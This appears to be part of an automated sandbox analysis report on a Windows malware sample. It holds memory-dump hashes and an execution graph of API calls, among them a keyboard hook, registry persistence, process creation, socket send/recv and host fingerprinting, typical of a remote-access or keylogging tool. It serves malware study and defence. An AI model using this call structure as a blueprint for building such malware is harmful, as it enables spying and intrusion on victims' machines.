                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                • API String ID: 0-2125118731
                                                                                • Opcode ID: 12264d22f85c550bd84ab0d645faa13c21b6244117c654cd4b1fe1376b4d929b
                                                                                • Instruction ID: 20ecb8889eb7cbe1960ca9908468f4db1228aec0b083608978c9d9370e3576ab
                                                                                • Opcode Fuzzy Hash: 12264d22f85c550bd84ab0d645faa13c21b6244117c654cd4b1fe1376b4d929b
                                                                                • Instruction Fuzzy Hash: 3C218BB170032A5BDB29856A5C00B37AFEA5BC0710F24842AA41ACF3C5DE3AC9579321
                                                                                Function 07120081 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                • API String ID: 0-2049395529
                                                                                • Opcode ID: 1f61a54ea339f0eba942d0f0d371733b050a1a18eb326f18bbac97f5bb6fc51f
                                                                                • Instruction ID: 21a815d3eb82141e7eec21f8154d762276952b412b247eb0ae8ad6053b622909
                                                                                • Opcode Fuzzy Hash: 1f61a54ea339f0eba942d0f0d371733b050a1a18eb326f18bbac97f5bb6fc51f
                                                                                • Instruction Fuzzy Hash: 4801F12070D3E54FD72B02291C2052A6FB25FCB69032A42DBC080CF2DBCE558C5A93A6

                                                                                Execution Graph

                                                                                Execution Coverage:1.9%
                                                                                Dynamic/Decrypted Code Coverage:22.8%
                                                                                Signature Coverage:25.8%
                                                                                Total number of Nodes:1130
                                                                                Total number of Limit Nodes:54
                                                                                execution_graph 84337 4099d0 84340 409a97 84337->84340 84339 4099e1 84341 409ab4 84340->84341 84342 409af7 CallNextHookEx 84340->84342 84343 409ae0 84341->84343 84344 409abf 84341->84344 84342->84339 84353 40a931 29 API calls 84343->84353 84345 409ad2 84344->84345 84346 409ac4 84344->84346 84406 40adb0 30 API calls 84345->84406 84346->84342 84405 40ad56 38 API calls 84346->84405 84349 409ad0 84349->84342 84351 409aec 84351->84342 84354 40abfd 84351->84354 84353->84351 84355 40ad40 84354->84355 84356 40ac17 84354->84356 84434 409b10 36 API calls ___scrt_fastfail 84355->84434 84357 40ac9b 84356->84357 84358 40ac1d 84356->84358 84361 401f66 28 API calls 84357->84361 84400 40ad3e 84358->84400 84407 401f66 84358->84407 84360 40ad49 84435 409d58 27 API calls 84360->84435 84362 40aca9 84361->84362 84364 401f66 28 API calls 84362->84364 84366 40acb7 84364->84366 84422 41ae08 84366->84422 84371 40accc 84426 40ae1e 31 API calls 84371->84426 84372 401f66 28 API calls 84374 40ac63 84372->84374 84415 4085fd 28 API calls 84374->84415 84375 40acda 84377 41ae08 28 API calls 84375->84377 84379 40ace8 84377->84379 84378 40ac6e 84416 40275c 28 API calls 84378->84416 84427 402860 28 API calls 84379->84427 84382 40ac78 84417 409d33 29 API calls 84382->84417 84383 40acf3 84428 402860 28 API calls 84383->84428 84386 40ac80 84418 401eea 84386->84418 84387 40acfd 84429 409d58 27 API calls 84387->84429 84390 40ac89 84392 401eea 26 API calls 84390->84392 84391 40ad05 84430 401e13 84391->84430 84395 40ac92 84392->84395 84394 40ad0e 84396 401e13 26 API calls 84394->84396 84398 401eea 26 API calls 84395->84398 84397 40ad17 84396->84397 84399 401e13 26 API calls 84397->84399 84398->84400 84401 40ad20 84399->84401 84400->84342 84402 401e13 26 API calls 84401->84402 84403 40ad2c 84402->84403 84404 401eea 26 API calls 84403->84404 84404->84395 84405->84349 84406->84349 84408 401f6e 84407->84408 84436 402301 84408->84436 84411 43e7eb 84412 40ac53 84411->84412 84413 43e7f9 84411->84413 84412->84372 84445 43e7a1 46 API calls 84413->84445 84415->84378 84416->84382 84417->84386 84419 4021b9 84418->84419 84420 4021e8 84419->84420 84446 40262e 26 API calls _Deallocate 84419->84446 84420->84390 84423 41ae1c 84422->84423 84447 40b027 84423->84447 84425 41ae24 84425->84371 84426->84375 84427->84383 84428->84387 84429->84391 84432 402121 84430->84432 84431 402150 84431->84394 84432->84431 84456 402718 26 API calls _Deallocate 84432->84456 84434->84360 84435->84400 84437 40230d 84436->84437 84440 402325 84437->84440 84439 401f80 84439->84411 84441 40232f 84440->84441 84443 40233a 84441->84443 84444 40294a 28 API calls 84441->84444 84443->84439 84444->84443 84445->84412 84446->84420 84448 40b02f 84447->84448 84451 40b04b 84448->84451 84450 40b045 84450->84425 84452 40b055 84451->84452 84454 40b060 84452->84454 84455 40b138 28 API calls 84452->84455 84454->84450 84455->84454 84456->84431 84457 41d4d0 84458 41d4e6 _Yarn ___scrt_fastfail 84457->84458 84459 41d6e3 84458->84459 84461 431f99 21 API calls 84458->84461 84463 41d734 84459->84463 84473 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 84459->84473 84466 41d696 ___scrt_fastfail 84461->84466 84462 41d6f4 84462->84463 84464 41d760 84462->84464 84474 431f99 84462->84474 84464->84463 84482 41d474 21 API calls ___scrt_fastfail 84464->84482 84466->84463 84468 431f99 21 API calls 84466->84468 84471 41d6be ___scrt_fastfail 84468->84471 84469 41d72d ___scrt_fastfail 84469->84463 84479 43264f 84469->84479 84471->84463 84472 431f99 21 API calls 84471->84472 84472->84459 84473->84462 84475 431fa3 84474->84475 84476 431fa7 84474->84476 84475->84469 84483 43a88c 84476->84483 84492 43256f 84479->84492 84481 432657 84481->84464 84482->84463 84488 446aff _strftime 84483->84488 84484 446b3d 84491 445354 20 API calls __dosmaperr 84484->84491 84485 446b28 RtlAllocateHeap 84487 431fac 84485->84487 84485->84488 84487->84469 84488->84484 84488->84485 84490 442200 7 API calls 2 library calls 84488->84490 84490->84488 84491->84487 84493 432588 84492->84493 84497 43257e 84492->84497 84494 431f99 21 API calls 84493->84494 84493->84497 84495 4325a9 84494->84495 84495->84497 84498 43293a CryptAcquireContextA 84495->84498 84497->84481 84499 432956 84498->84499 84500 43295b CryptGenRandom 84498->84500 84499->84497 84500->84499 84501 432970 CryptReleaseContext 84500->84501 84501->84499 84502 426030 84507 4260f7 recv 84502->84507 84508 44e8b6 84509 44e8c1 84508->84509 84510 44e8e9 84509->84510 84512 44e8da 84509->84512 84511 44e8f8 84510->84511 84530 455573 27 API calls 2 library calls 84510->84530 84517 44b9be 84511->84517 84529 445354 20 API calls __dosmaperr 84512->84529 84516 44e8df ___scrt_fastfail 84518 44b9d6 84517->84518 84519 44b9cb 84517->84519 84521 44b9de 84518->84521 84527 44b9e7 _strftime 84518->84527 84531 446aff 84519->84531 84538 446ac5 20 API calls __dosmaperr 84521->84538 84522 44ba11 HeapReAlloc 84526 44b9d3 84522->84526 84522->84527 84523 44b9ec 84539 445354 20 API calls __dosmaperr 84523->84539 84526->84516 84527->84522 84527->84523 84540 442200 7 API calls 2 library calls 84527->84540 84529->84516 84530->84511 84532 446b3d 84531->84532 84536 446b0d _strftime 84531->84536 84542 445354 20 API calls __dosmaperr 84532->84542 84533 446b28 RtlAllocateHeap 84535 446b3b 84533->84535 84533->84536 84535->84526 84536->84532 84536->84533 84541 442200 7 API calls 2 library calls 84536->84541 84538->84526 84539->84526 84540->84527 84541->84536 84542->84535 84543 426091 84548 42610e send 84543->84548 84549 78003c 84550 780049 84549->84550 84564 780e0f SetErrorMode SetErrorMode 84550->84564 84555 780265 84556 7802ce VirtualProtect 84555->84556 84558 78030b 84556->84558 84557 780439 VirtualFree 84562 7804be 84557->84562 84563 7805f4 LoadLibraryA 84557->84563 84558->84557 84559 7804e3 LoadLibraryA 84559->84562 84561 7808c7 84562->84559 84562->84563 84563->84561 84565 780223 84564->84565 84566 780d90 84565->84566 84567 780dad 84566->84567 84568 780dbb GetPEB 84567->84568 84569 780238 VirtualAlloc 84567->84569 84568->84569 84569->84555 84570 5b0000 84573 5b0006 84570->84573 84574 5b0015 84573->84574 84577 5b07a6 84574->84577 84578 5b07c1 84577->84578 84579 5b07ca CreateToolhelp32Snapshot 84578->84579 84580 5b07e6 Module32First 84578->84580 84579->84578 84579->84580 84581 5b0005 84580->84581 84582 5b07f5 84580->84582 84584 5b0465 84582->84584 84585 5b0490 84584->84585 84586 5b04a1 VirtualAlloc 84585->84586 84587 5b04d9 84585->84587 84586->84587 84588 43a998 84590 43a9a4 _swprintf __FrameHandler3::FrameUnwindToState 84588->84590 84589 43a9b2 84606 445354 20 API calls __dosmaperr 84589->84606 84590->84589 84593 43a9dc 84590->84593 84592 43a9b7 84607 43a827 26 API calls _Deallocate 84592->84607 84601 444acc EnterCriticalSection 84593->84601 84596 43a9e7 84602 43aa88 84596->84602 84600 43a9c2 std::_Locinfo::_Locinfo_ctor 84601->84596 84604 43aa96 84602->84604 84603 43a9f2 84608 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 84603->84608 84604->84603 84609 448416 39 API calls 2 library calls 84604->84609 84606->84592 84607->84600 84608->84600 84609->84604 84610 402bcc 84611 402bd7 84610->84611 84612 402bdf 84610->84612 84628 403315 28 API calls 2 library calls 84611->84628 84614 402beb 84612->84614 84618 4015d3 84612->84618 84615 402bdd 84620 43360d 84618->84620 84619 43a88c ___std_exception_copy 21 API calls 84619->84620 84620->84619 84621 402be9 84620->84621 84623 43362e std::_Facet_Register 84620->84623 84629 442200 7 API calls 2 library calls 84620->84629 84624 433dec std::_Facet_Register 84623->84624 84630 437bd7 RaiseException 84623->84630 84631 437bd7 RaiseException 84624->84631 84627 433e09 84628->84615 84629->84620 84630->84624 84631->84627 84632 4339be 84633 4339ca __FrameHandler3::FrameUnwindToState 84632->84633 84664 4336b3 84633->84664 84635 4339d1 84636 433b24 84635->84636 84640 4339fb 84635->84640 84964 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 84636->84964 84638 433b2b 84965 4426be 28 API calls _abort 84638->84965 84651 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 84640->84651 84958 4434d1 5 API calls _ValidateLocalCookies 84640->84958 84641 433b31 84966 442670 28 API calls _abort 84641->84966 84644 433a14 84646 433a1a 84644->84646 84959 443475 5 API calls _ValidateLocalCookies 84644->84959 84645 433b39 84648 433a9b 84675 433c5e 84648->84675 84651->84648 84960 43edf4 38 API calls 4 library calls 84651->84960 84658 433abd 84658->84638 84659 433ac1 84658->84659 84660 433aca 84659->84660 84962 442661 28 API calls _abort 84659->84962 84963 433842 13 API calls 2 library calls 84660->84963 84663 433ad2 84663->84646 84665 4336bc 84664->84665 84967 433e0a IsProcessorFeaturePresent 84665->84967 84667 4336c8 84968 4379ee 10 API calls 3 library calls 84667->84968 84669 4336cd 84670 4336d1 84669->84670 84969 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 84669->84969 84670->84635 84672 4336da 84673 4336e8 84672->84673 84970 437a17 8 API calls 3 library calls 84672->84970 84673->84635 84971 436050 84675->84971 84677 433c71 GetStartupInfoW 84678 433aa1 84677->84678 84679 443422 84678->84679 84973 44ddc9 84679->84973 84681 44342b 84682 433aaa 84681->84682 84977 44e0d3 38 API calls 84681->84977 84684 40d767 84682->84684 84979 41bce3 LoadLibraryA GetProcAddress 84684->84979 84686 40d783 GetModuleFileNameW 84984 40e168 84686->84984 84688 40d79f 84999 401fbd 84688->84999 84691 401fbd 28 API calls 84692 40d7bd 84691->84692 85003 41afc3 84692->85003 84696 40d7cf 85028 401d8c 84696->85028 84698 40d7d8 84699 40d835 84698->84699 84700 40d7eb 84698->84700 85034 401d64 84699->85034 85270 40e986 90 API calls 84700->85270 84703 40d845 84706 401d64 28 API calls 84703->84706 84704 40d7fd 84705 401d64 28 API calls 84704->84705 84708 40d809 84705->84708 84707 40d864 84706->84707 85039 404cbf 84707->85039 85271 40e937 68 API calls 84708->85271 84710 40d873 85043 405ce6 84710->85043 84713 40d87f 85046 401eef 84713->85046 84714 40d824 85272 40e155 68 API calls 84714->85272 84717 40d88b 84718 401eea 26 API calls 84717->84718 84719 40d894 84718->84719 84721 401eea 26 API calls 84719->84721 84720 401eea 26 API calls 84722 40dc9f 84720->84722 84723 40d89d 84721->84723 84961 433c94 GetModuleHandleW 84722->84961 84724 401d64 28 API calls 84723->84724 84725 40d8a6 84724->84725 85050 401ebd 84725->85050 84727 40d8b1 84728 401d64 28 API calls 84727->84728 84729 40d8ca 84728->84729 84730 401d64 28 API calls 84729->84730 84732 40d8e5 84730->84732 84731 40d946 84733 401d64 28 API calls 84731->84733 84748 40e134 84731->84748 84732->84731 85273 4085b4 84732->85273 84739 40d95d 84733->84739 84735 40d912 84736 401eef 26 API calls 84735->84736 84737 40d91e 84736->84737 84740 401eea 26 API calls 84737->84740 84738 40d9a4 85054 40bed7 84738->85054 84739->84738 84745 4124b7 3 API calls 84739->84745 84742 40d927 84740->84742 85277 4124b7 RegOpenKeyExA 84742->85277 84743 40d9aa 84744 40d82d 84743->84744 85057 41a463 84743->85057 84744->84720 84750 40d988 84745->84750 85353 412902 30 API calls 84748->85353 84749 40d9c5 84751 40da18 84749->84751 85074 40697b 84749->85074 84750->84738 85280 412902 30 API calls 84750->85280 84754 401d64 28 API calls 84751->84754 84756 40da21 84754->84756 84765 40da32 84756->84765 84766 40da2d 84756->84766 84758 40e14a 85354 4112b5 64 API calls ___scrt_fastfail 84758->85354 84759 40d9e4 85281 40699d 30 API calls 84759->85281 84760 40d9ee 84764 401d64 28 API calls 84760->84764 84773 40d9f7 84764->84773 84770 401d64 28 API calls 84765->84770 85284 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 84766->85284 84767 40d9e9 85282 4064d0 97 API calls 84767->85282 84771 40da3b 84770->84771 84772 41ae08 28 API calls 84771->84772 84774 40da46 84772->84774 84773->84751 84776 40da13 84773->84776 85078 401e18 84774->85078 85283 4064d0 97 API calls 84776->85283 84777 40da51 84779 401e13 26 API calls 84777->84779 84780 40da5a 84779->84780 84781 401d64 28 API calls 84780->84781 84782 40da63 84781->84782 84783 401d64 28 API calls 84782->84783 84784 40da7d 84783->84784 84785 401d64 28 API calls 84784->84785 84786 40da97 84785->84786 84787 401d64 28 API calls 84786->84787 84789 40dab0 84787->84789 84788 40db1d 84790 40db2c 84788->84790 84797 40dcaa ___scrt_fastfail 84788->84797 84789->84788 84791 401d64 28 API calls 84789->84791 84792 40db35 84790->84792 84820 40dbb1 ___scrt_fastfail 84790->84820 84795 40dac5 _wcslen 84791->84795 84793 401d64 28 API calls 84792->84793 84794 40db3e 84793->84794 84796 401d64 28 API calls 84794->84796 84795->84788 84798 401d64 28 API calls 84795->84798 84799 40db50 84796->84799 85344 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 84797->85344 84800 40dae0 84798->84800 84802 401d64 28 API calls 84799->84802 84804 401d64 28 API calls 84800->84804 84803 40db62 84802->84803 84807 401d64 28 API calls 84803->84807 84805 40daf5 84804->84805 85285 40c89e 84805->85285 84806 40dcef 84808 401d64 28 API calls 84806->84808 84809 40db8b 84807->84809 84810 40dd16 84808->84810 84815 401d64 28 API calls 84809->84815 84816 401f66 28 API calls 84810->84816 84813 401e18 26 API calls 84814 40db14 84813->84814 84817 401e13 26 API calls 84814->84817 84818 40db9c 84815->84818 84819 40dd25 84816->84819 84817->84788 85342 40bc67 46 API calls _wcslen 84818->85342 85092 4126d2 RegCreateKeyA 84819->85092 85082 4128a2 84820->85082 84825 40dc45 ctype 84829 401d64 28 API calls 84825->84829 84826 40dbac 84826->84820 84827 401d64 28 API calls 84828 40dd47 84827->84828 85098 43a5e7 84828->85098 84830 40dc5c 84829->84830 84830->84806 84834 40dc70 84830->84834 84833 40dd5e 85345 41beb0 87 API calls ___scrt_fastfail 84833->85345 84836 401d64 28 API calls 84834->84836 84835 40dd81 84841 401f66 28 API calls 84835->84841 84838 40dc7e 84836->84838 84839 41ae08 28 API calls 84838->84839 84843 40dc87 84839->84843 84840 40dd65 CreateThread 84840->84835 85765 41c96f 10 API calls 84840->85765 84842 40dd96 84841->84842 84844 401f66 28 API calls 84842->84844 85343 40e219 112 API calls 84843->85343 84846 40dda5 84844->84846 85102 41a686 84846->85102 84847 40dc8c 84847->84806 84849 40dc93 84847->84849 84849->84744 84851 401d64 28 API calls 84852 40ddb6 84851->84852 84853 401d64 28 API calls 84852->84853 84854 40ddcb 84853->84854 84855 401d64 28 API calls 84854->84855 84856 40ddeb 84855->84856 84857 43a5e7 42 API calls 84856->84857 84858 40ddf8 84857->84858 84859 401d64 28 API calls 84858->84859 84860 40de03 84859->84860 84861 401d64 28 API calls 84860->84861 84862 40de14 84861->84862 84863 401d64 28 API calls 84862->84863 84864 40de29 84863->84864 84865 401d64 28 API calls 84864->84865 84866 40de3a 84865->84866 84867 40de41 StrToIntA 84866->84867 85126 409517 84867->85126 84870 401d64 28 API calls 84871 40de5c 84870->84871 84872 40dea1 84871->84872 84873 40de68 84871->84873 84875 401d64 28 API calls 84872->84875 85346 43360d 22 API calls 3 library calls 84873->85346 84877 40deb1 84875->84877 84876 40de71 84878 401d64 28 API calls 84876->84878 84880 40def9 84877->84880 84881 40debd 84877->84881 84879 40de84 84878->84879 84882 40de8b CreateThread 84879->84882 84884 401d64 28 API calls 84880->84884 85347 43360d 22 API calls 3 library calls 84881->85347 84882->84872 85761 419128 109 API calls __EH_prolog 84882->85761 84886 40df02 84884->84886 84885 40dec6 84887 401d64 28 API calls 84885->84887 84889 40df6c 84886->84889 84890 40df0e 84886->84890 84888 40ded8 84887->84888 84893 40dedf CreateThread 84888->84893 84891 401d64 28 API calls 84889->84891 84892 401d64 28 API calls 84890->84892 84894 40df75 84891->84894 84895 40df1e 84892->84895 84893->84880 85766 419128 109 API calls __EH_prolog 84893->85766 84896 40df81 84894->84896 84897 40dfba 84894->84897 84898 401d64 28 API calls 84895->84898 84900 401d64 28 API calls 84896->84900 85151 41a7a2 GetComputerNameExW GetUserNameW 84897->85151 84901 40df33 84898->84901 84903 40df8a 84900->84903 85348 40c854 32 API calls 84901->85348 84908 401d64 28 API calls 84903->84908 84904 401e18 26 API calls 84905 40dfce 84904->84905 84907 401e13 26 API calls 84905->84907 84910 40dfd7 84907->84910 84911 40df9f 84908->84911 84909 40df46 84912 401e18 26 API calls 84909->84912 84913 40dfe0 SetProcessDEPPolicy 84910->84913 84914 40dfe3 CreateThread 84910->84914 84922 43a5e7 42 API calls 84911->84922 84915 40df52 84912->84915 84913->84914 84916 40e004 84914->84916 84917 40dff8 CreateThread 84914->84917 85734 40e54f 84914->85734 84918 401e13 26 API calls 84915->84918 84920 40e019 84916->84920 84921 40e00d CreateThread 84916->84921 84917->84916 85762 410f36 137 API calls 84917->85762 84919 40df5b CreateThread 84918->84919 84919->84889 85763 40196b 49 API calls 84919->85763 84924 40e073 84920->84924 84926 401f66 28 API calls 84920->84926 84921->84920 85764 411524 38 API calls ___scrt_fastfail 84921->85764 84923 40dfac 84922->84923 85349 40b95c 7 API calls 84923->85349 85162 41246e RegOpenKeyExA 84924->85162 84927 40e046 84926->84927 85350 404c9e 28 API calls 84927->85350 84931 40e053 84933 401f66 28 API calls 84931->84933 84932 40e12a 85174 40cbac 84932->85174 84935 40e062 84933->84935 84934 41ae08 28 API calls 84937 40e0a4 84934->84937 84938 41a686 79 API calls 84935->84938 85165 412584 RegOpenKeyExW 84937->85165 84940 40e067 84938->84940 84942 401eea 26 API calls 84940->84942 84942->84924 84945 401e13 26 API calls 84948 40e0c5 84945->84948 84946 40e0ed DeleteFileW 84947 40e0f4 84946->84947 84946->84948 84949 41ae08 28 API calls 84947->84949 84948->84946 84948->84947 84950 40e0db Sleep 84948->84950 84951 40e104 84949->84951 85351 401e07 84950->85351 85170 41297a RegOpenKeyExW 84951->85170 84954 40e117 84955 401e13 26 API calls 84954->84955 84956 40e121 84955->84956 84957 401e13 26 API calls 84956->84957 84957->84932 84958->84644 84959->84651 84960->84648 84961->84658 84962->84660 84963->84663 84964->84638 84965->84641 84966->84645 84967->84667 84968->84669 84969->84672 84970->84670 84972 436067 84971->84972 84972->84677 84972->84972 84974 44dddb 84973->84974 84975 44ddd2 84973->84975 84974->84681 84978 44dcc8 51 API calls 5 library calls 84975->84978 84977->84681 84978->84974 84980 41bd22 LoadLibraryA GetProcAddress 84979->84980 84981 41bd12 GetModuleHandleA GetProcAddress 84979->84981 84982 41bd4b 32 API calls 84980->84982 84983 41bd3b LoadLibraryA GetProcAddress 84980->84983 84981->84980 84982->84686 84983->84982 85355 41a63f FindResourceA 84984->85355 84987 43a88c ___std_exception_copy 21 API calls 84988 40e192 _Yarn 84987->84988 85358 401f86 84988->85358 84991 401eef 26 API calls 84992 40e1b8 84991->84992 84993 401eea 26 API calls 84992->84993 84994 40e1c1 84993->84994 84995 43a88c ___std_exception_copy 21 API calls 84994->84995 84996 40e1d2 _Yarn 84995->84996 85362 406052 84996->85362 84998 40e205 84998->84688 85000 401fcc 84999->85000 85365 402501 85000->85365 85002 401fea 85002->84691 85004 41afd6 85003->85004 85008 41b048 85004->85008 85016 401eef 26 API calls 85004->85016 85019 401eea 26 API calls 85004->85019 85023 41b046 85004->85023 85370 403b60 28 API calls 85004->85370 85371 41bfa9 85004->85371 85005 401eea 26 API calls 85006 41b078 85005->85006 85007 401eea 26 API calls 85006->85007 85009 41b080 85007->85009 85378 403b60 28 API calls 85008->85378 85012 401eea 26 API calls 85009->85012 85014 40d7c6 85012->85014 85013 41b054 85015 401eef 26 API calls 85013->85015 85024 40e8bd 85014->85024 85017 41b05d 85015->85017 85016->85004 85018 401eea 26 API calls 85017->85018 85020 41b065 85018->85020 85019->85004 85021 41bfa9 28 API calls 85020->85021 85021->85023 85023->85005 85025 40e8ca 85024->85025 85027 40e8da 85025->85027 85406 40200a 26 API calls 85025->85406 85027->84696 85029 40200a 85028->85029 85033 40203a 85029->85033 85407 402654 26 API calls 85029->85407 85031 40202b 85408 4026ba 26 API calls _Deallocate 85031->85408 85033->84698 85035 401d6c 85034->85035 85036 401d74 85035->85036 85409 401fff 28 API calls 85035->85409 85036->84703 85040 404ccb 85039->85040 85410 402e78 85040->85410 85042 404cee 85042->84710 85419 404bc4 85043->85419 85045 405cf4 85045->84713 85047 401efe 85046->85047 85049 401f0a 85047->85049 85428 4021b9 26 API calls 85047->85428 85049->84717 85052 401ec9 85050->85052 85051 401ee4 85051->84727 85052->85051 85053 402325 28 API calls 85052->85053 85053->85051 85429 401e8f 85054->85429 85056 40bee1 CreateMutexA GetLastError 85056->84743 85431 41b15b 85057->85431 85059 41a471 85435 412513 RegOpenKeyExA 85059->85435 85062 401eef 26 API calls 85063 41a49f 85062->85063 85064 401eea 26 API calls 85063->85064 85065 41a4a7 85064->85065 85066 41a4fa 85065->85066 85067 412513 31 API calls 85065->85067 85066->84749 85068 41a4cd 85067->85068 85069 41a4d8 StrToIntA 85068->85069 85070 41a4ef 85069->85070 85071 41a4e6 85069->85071 85073 401eea 26 API calls 85070->85073 85440 41c102 28 API calls 85071->85440 85073->85066 85075 40698f 85074->85075 85076 4124b7 3 API calls 85075->85076 85077 406996 85076->85077 85077->84759 85077->84760 85079 401e27 85078->85079 85081 401e33 85079->85081 85441 402121 26 API calls 85079->85441 85081->84777 85083 4128c0 85082->85083 85084 406052 28 API calls 85083->85084 85085 4128d5 85084->85085 85086 401fbd 28 API calls 85085->85086 85087 4128e5 85086->85087 85088 4126d2 29 API calls 85087->85088 85089 4128ef 85088->85089 85090 401eea 26 API calls 85089->85090 85091 4128fc 85090->85091 85091->84825 85093 412722 85092->85093 85096 4126eb 85092->85096 85094 401eea 26 API calls 85093->85094 85095 40dd3b 85094->85095 85095->84827 85097 4126fd RegSetValueExA RegCloseKey 85096->85097 85097->85093 85099 43a600 _swprintf 85098->85099 85442 43993e 85099->85442 85103 41a737 85102->85103 85104 41a69c GetLocalTime 85102->85104 85106 401eea 26 API calls 85103->85106 85105 404cbf 28 API calls 85104->85105 85107 41a6de 85105->85107 85108 41a73f 85106->85108 85109 405ce6 28 API calls 85107->85109 85110 401eea 26 API calls 85108->85110 85111 41a6ea 85109->85111 85112 40ddaa 85110->85112 85476 4027cb 85111->85476 85112->84851 85114 41a6f6 85115 405ce6 28 API calls 85114->85115 85116 41a702 85115->85116 85479 406478 76 API calls 85116->85479 85118 41a710 85119 401eea 26 API calls 85118->85119 85120 41a71c 85119->85120 85121 401eea 26 API calls 85120->85121 85122 41a725 85121->85122 85123 401eea 26 API calls 85122->85123 85124 41a72e 85123->85124 85125 401eea 26 API calls 85124->85125 85125->85103 85127 409536 _wcslen 85126->85127 85128 409541 85127->85128 85129 409558 85127->85129 85131 40c89e 32 API calls 85128->85131 85130 40c89e 32 API calls 85129->85130 85132 409560 85130->85132 85133 409549 85131->85133 85134 401e18 26 API calls 85132->85134 85135 401e18 26 API calls 85133->85135 85136 40956e 85134->85136 85137 409553 85135->85137 85138 401e13 26 API calls 85136->85138 85140 401e13 26 API calls 85137->85140 85139 409576 85138->85139 85499 40856b 28 API calls 85139->85499 85141 4095ad 85140->85141 85484 409837 85141->85484 85144 409588 85500 4028cf 85144->85500 85147 409593 85148 401e18 26 API calls 85147->85148 85149 40959d 85148->85149 85150 401e13 26 API calls 85149->85150 85150->85137 85526 403b40 85151->85526 85155 41a7fd 85156 4028cf 28 API calls 85155->85156 85157 41a807 85156->85157 85158 401e13 26 API calls 85157->85158 85159 41a810 85158->85159 85160 401e13 26 API calls 85159->85160 85161 40dfc3 85160->85161 85161->84904 85163 40e08b 85162->85163 85164 41248f RegQueryValueExA RegCloseKey 85162->85164 85163->84932 85163->84934 85164->85163 85166 4125b0 RegQueryValueExW RegCloseKey 85165->85166 85167 4125dd 85165->85167 85166->85167 85168 403b40 28 API calls 85167->85168 85169 40e0ba 85168->85169 85169->84945 85171 412992 RegDeleteValueW 85170->85171 85172 4129a6 85170->85172 85171->85172 85173 4129a2 85171->85173 85172->84954 85173->84954 85175 40cbc5 85174->85175 85176 41246e 3 API calls 85175->85176 85177 40cbcc 85176->85177 85181 40cbeb 85177->85181 85559 401602 85177->85559 85179 40cbd9 85562 4127d5 RegCreateKeyA 85179->85562 85182 413fd4 85181->85182 85183 413feb 85182->85183 85579 41aa73 85183->85579 85185 413ff6 85186 401d64 28 API calls 85185->85186 85187 41400f 85186->85187 85188 43a5e7 42 API calls 85187->85188 85189 41401c 85188->85189 85190 414021 Sleep 85189->85190 85191 41402e 85189->85191 85190->85191 85192 401f66 28 API calls 85191->85192 85193 41403d 85192->85193 85194 401d64 28 API calls 85193->85194 85195 41404b 85194->85195 85196 401fbd 28 API calls 85195->85196 85197 414053 85196->85197 85198 41afc3 28 API calls 85197->85198 85199 41405b 85198->85199 85583 404262 WSAStartup 85199->85583 85201 414065 85202 401d64 28 API calls 85201->85202 85203 41406e 85202->85203 85204 401d64 28 API calls 85203->85204 85228 4140ed 85203->85228 85205 414087 85204->85205 85207 401d64 28 API calls 85205->85207 85206 401fbd 28 API calls 85206->85228 85208 414098 85207->85208 85210 401d64 28 API calls 85208->85210 85209 41afc3 28 API calls 85209->85228 85211 4140a9 85210->85211 85213 401d64 28 API calls 85211->85213 85212 4085b4 28 API calls 85212->85228 85214 4140ba 85213->85214 85216 401d64 28 API calls 85214->85216 85215 401eef 26 API calls 85215->85228 85217 4140cb 85216->85217 85218 401d64 28 API calls 85217->85218 85219 4140dd 85218->85219 85688 404101 87 API calls 85219->85688 85221 41a686 79 API calls 85221->85228 85223 414244 WSAGetLastError 85689 41bc76 30 API calls 85223->85689 85228->85206 85228->85209 85228->85212 85228->85215 85228->85221 85228->85223 85230 401f66 28 API calls 85228->85230 85232 401d64 28 API calls 85228->85232 85233 404cbf 28 API calls 85228->85233 85234 401d8c 26 API calls 85228->85234 85235 4027cb 28 API calls 85228->85235 85236 43a5e7 42 API calls 85228->85236 85237 405ce6 28 API calls 85228->85237 85239 401eea 26 API calls 85228->85239 85242 4082dc 28 API calls 85228->85242 85245 412513 31 API calls 85228->85245 85249 41446f 85228->85249 85584 413f9a 85228->85584 85590 4041f1 85228->85590 85597 404915 85228->85597 85612 40428c connect 85228->85612 85672 41a96d GlobalMemoryStatusEx 85228->85672 85673 413683 50 API calls 85228->85673 85674 4047eb WaitForSingleObject 85228->85674 85690 404c9e 28 API calls 85228->85690 85691 440c51 26 API calls 85228->85691 85692 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 85228->85692 85230->85228 85232->85228 85233->85228 85234->85228 85235->85228 85238 414b80 Sleep 85236->85238 85237->85228 85238->85228 85239->85228 85242->85228 85245->85228 85246 403b40 28 API calls 85246->85249 85249->85228 85249->85246 85250 401d64 28 API calls 85249->85250 85254 41ad46 28 API calls 85249->85254 85256 41aec8 28 API calls 85249->85256 85259 405ce6 28 API calls 85249->85259 85260 40275c 28 API calls 85249->85260 85261 4027cb 28 API calls 85249->85261 85263 401eea 26 API calls 85249->85263 85264 401e13 26 API calls 85249->85264 85267 401f66 28 API calls 85249->85267 85268 41a686 79 API calls 85249->85268 85269 414b22 CreateThread 85249->85269 85693 40cbf1 6 API calls 85249->85693 85694 41adee 28 API calls 85249->85694 85696 41aca0 GetLastInputInfo GetTickCount 85249->85696 85697 41ac52 30 API calls ___scrt_fastfail 85249->85697 85698 40e679 29 API calls 85249->85698 